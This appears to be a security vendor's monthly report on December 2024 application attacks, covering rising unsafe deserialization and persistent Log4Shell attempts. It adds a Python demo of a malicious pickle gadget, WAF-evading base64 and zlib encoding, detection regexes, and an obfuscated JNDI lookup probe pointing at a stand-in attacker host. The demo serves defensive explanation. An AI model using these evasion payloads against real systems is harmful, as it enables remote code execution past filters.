Attacks on individual applications were down month to month in December 2024, but one of the most dangerous types of attacks was up significantly. That’s according to data Contrast Security publishes monthly about the detection and response of real-world application and application programming interface (API) attacks with Application Detection and Response (ADR). What you’re about to see is data that we gather from the attacks on our apps and those of our customers, anonymized and averaged.
Last month, each individual application or API was attacked an average of 45 times, down slightly from the month before. Those are real attacks, not the kind of false positives that drive security teams crazy. Within that total, unsafe deserialization jumped: it was used against each application and API an average of 22 times.
Context
We’ll get to more of the attack data in a moment. We want to start with some context to explain how we use the word “attack.” We are talking only about attacks that are confirmed to reach their intended vulnerability and are about to launch the exploit, not “the noise of the internet” type attacks that would never have turned into a noteworthy breach. Contrast tunes out the noise, filtering out the false positives.
Contrast’s attack data is measured directly from real-world running applications and APIs. Our attacks aren’t measured in millions, billions or even trillions, because that’s part of the problem: too much noise. Because Contrast Security instruments the code, we’re not reporting on signatures or theoretical attacks, only what’s actually a dangerous anomaly.
To better explain, take a look at this graphic, which accounts for one month of data per application. For each application, organizations see hundreds of millions of calls to potentially dangerous functions. From these calls, "security relevant observations" are isolated for closer examination. For some organizations, that’s where alert fatigue begins. Then, there are thousands of non-viable attacks that get past a web application firewall (WAF), also leading to false positives. But, what Contrast identifies are the actual viable attacks that reach a vulnerability. On average, the security operations center (SOC) should be worried about and focus on just a few a month, treating them as incidents.
When we look at what Contrast saw in December 2024, there were 480 million calls to potentially dangerous functions per application. Of the attacks Contrast ADR identified, an average of 45 reached each individual application or API, and only about three of those, on average, became incidents that needed to be investigated. What this graph shows is the importance of knowing exactly what to investigate to avoid alert fatigue.
The next image breaks down the types of viable attacks that Contrast ADR identified and stopped.
Three takeaways this month:
- Attacks are down slightly month to month. Attack volume across the broader cyber ecosystem usually rises over the holidays, but ADR also identifies a lot of security testing, and that testing drops off during the last two weeks of December, which likely explains why the number of applications reporting attacks went down.
- Unsafe deserialization is UP. Month to month, there was a sharp rise in these attacks, which can be incredibly impactful: a successful one typically hands the attacker code execution inside the application itself. WAFs struggle with unsafe deserialization for a number of reasons:
  - Complex payloads: serialized objects are binary or deeply nested structures that a WAF cannot parse and inspect effectively.
  - Application-specific: these attacks exploit language-, framework- and app/API-specific deserialization mechanisms (and the gadget chains available in that particular code base), which a WAF's generic rule set does not recognize.
  - Encoded or encrypted data: serialized payloads are often base64-encoded, compressed or encrypted in transit, so a WAF that matches on the raw request body sees nothing recognizable and the payload bypasses inspection entirely.
  - Evasion tactics: attackers can obfuscate malicious payloads to slip past WAF signatures.
- Log4Shell attacks are still causing problems. December marked the third anniversary of the disclosure of the Log4j vulnerability (Log4Shell, CVE-2021-44228). It is striking that even now we see attacks on vulnerable code every month. WAFs can stop some of them, but attackers can evade signature-based detection without much effort, for example by nesting Log4j lookups so that the literal string `${jndi:` never appears in the request. Contrast ADR stops these attacks.
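The two WAF weaknesses above, encoded serialized payloads and obfuscated Log4Shell lookups, share one root cause: a signature engine at the network edge inspects the wire representation of a request, while the attack only takes its recognizable form at the sink inside the application. The following is an added example, not Contrast's code and not taken from this report. It uses Python's `pickle` as a stand-in for Java serialization (the hypothetical `EvilPayload` class, the toy `GADGET_SIG` and `JNDI_SIG` regexes, the `RestrictedUnpickler` allow-list and the `evil.example` host are all constructed for illustration), and it emulates only the small subset of Log4j 2 lookup syntax that attackers use to split the `jndi` token.

```python
import base64
import io
import os
import pickle
import re
import zlib

# ---- Unsafe deserialization: the WAF sees encodings, the sink sees objects ----

class EvilPayload:
    """Constructed attacker object (hypothetical). pickle's __reduce__ hook lets
    a serialized object name any callable to invoke on load. Serializing it is
    harmless; loading it with plain pickle.loads() would run the command."""
    def __reduce__(self):
        return (os.system, ("echo pwned",))

def encode_body(obj, compress=False):
    """Attacker side: serialize, optionally zlib-compress, then base64-encode,
    the shape of many opaque session/state blobs an app will happily accept."""
    raw = pickle.dumps(obj, protocol=4)
    if compress:
        raw = zlib.compress(raw)
    return base64.b64encode(raw).decode()

# Toy WAF signature for gadget strings as they appear in a raw pickle stream
# (module name, a few opcode bytes, then the callable name).
GADGET_SIG = re.compile(rb"(posix|nt)\W{1,4}system|subprocess|__reduce__")

def waf_raw(body):
    """WAF matching the request body exactly as sent. base64 text has no '.',
    '_' or control bytes, so none of these signatures can fire on it."""
    return GADGET_SIG.search(body.encode()) is not None

def waf_base64_aware(body):
    """Smarter WAF that peels one base64 layer first. One extra layer of
    compression or encryption by the attacker puts it back to square one."""
    try:
        return GADGET_SIG.search(base64.b64decode(body)) is not None
    except ValueError:
        return False

class RestrictedUnpickler(pickle.Unpickler):
    """Sink-side control: resolve only allow-listed globals during load. It runs
    after every transport encoding has been undone, so it judges the actual
    object the attacker is trying to instantiate, not its wire representation."""
    ALLOWED = {("collections", "OrderedDict"), ("datetime", "date")}  # example allow-list

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"blocked global {module}.{name}")

def app_handle(body, compressed=False):
    """Application sink: undo the transport encodings, then deserialize."""
    raw = base64.b64decode(body)
    if compressed:
        raw = zlib.decompress(raw)
    try:
        return ("ok", RestrictedUnpickler(io.BytesIO(raw)).load())
    except pickle.UnpicklingError as exc:
        return ("blocked", str(exc))

# ---- Log4Shell: lookup obfuscation defeats a literal '${jndi:' signature ----

JNDI_SIG = re.compile(r"\$\{jndi:", re.IGNORECASE)

def waf_jndi(text):
    """Toy WAF rule for Log4Shell probes: match the literal lookup prefix."""
    return JNDI_SIG.search(text) is not None

_INNERMOST = re.compile(r"\$\{([^${}]*)\}")

def resolve_lookups(text, max_rounds=20):
    """Emulate the subset of Log4j 2 lookup syntax attackers use to split the
    'jndi' token: ${lower:X}, ${upper:X} and ${prefix:name:-default}. Innermost
    lookups resolve first, so an obfuscated string converges to its plain form,
    which is what the logging sink ultimately evaluates."""
    def resolve_one(m):
        body = m.group(1)
        if body.startswith("lower:"):
            return body[len("lower:"):].lower()
        if body.startswith("upper:"):
            return body[len("upper:"):].upper()
        if ":-" in body:                  # unknown lookup falls back to its default
            return body.split(":-", 1)[1]
        return m.group(0)                 # a real lookup such as jndi: stays as is
    for _ in range(max_rounds):
        new = _INNERMOST.sub(resolve_one, text)
        if new == text:
            break
        text = new
    return text

if __name__ == "__main__":
    probe = "${${env:NOPE:-j}${::-n}di:ldap://evil.example/a}"
    print(waf_jndi(probe), waf_jndi(resolve_lookups(probe)))              # False True
    body = encode_body(EvilPayload(), compress=True)
    print(waf_base64_aware(body), app_handle(body, compressed=True)[0])  # False blocked
```

The point of the two halves is the same: the edge rule fails as soon as the attacker adds one encoding layer or one level of lookup nesting, while the sink-side control (`RestrictedUnpickler.find_class`, or the resolved lookup string) sees the attack in exactly one canonical form regardless of how it was wrapped on the wire. In a real deployment the allow-list would be derived from the types the application actually deserializes, and the Log4j fix is to upgrade or remove the JNDI lookup rather than to normalize strings in front of it.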
We’ll see what next month brings and whether the jump in unsafe deserialization continues.
Contact Contrast Security if you’d like to see what’s really happening in your application layer.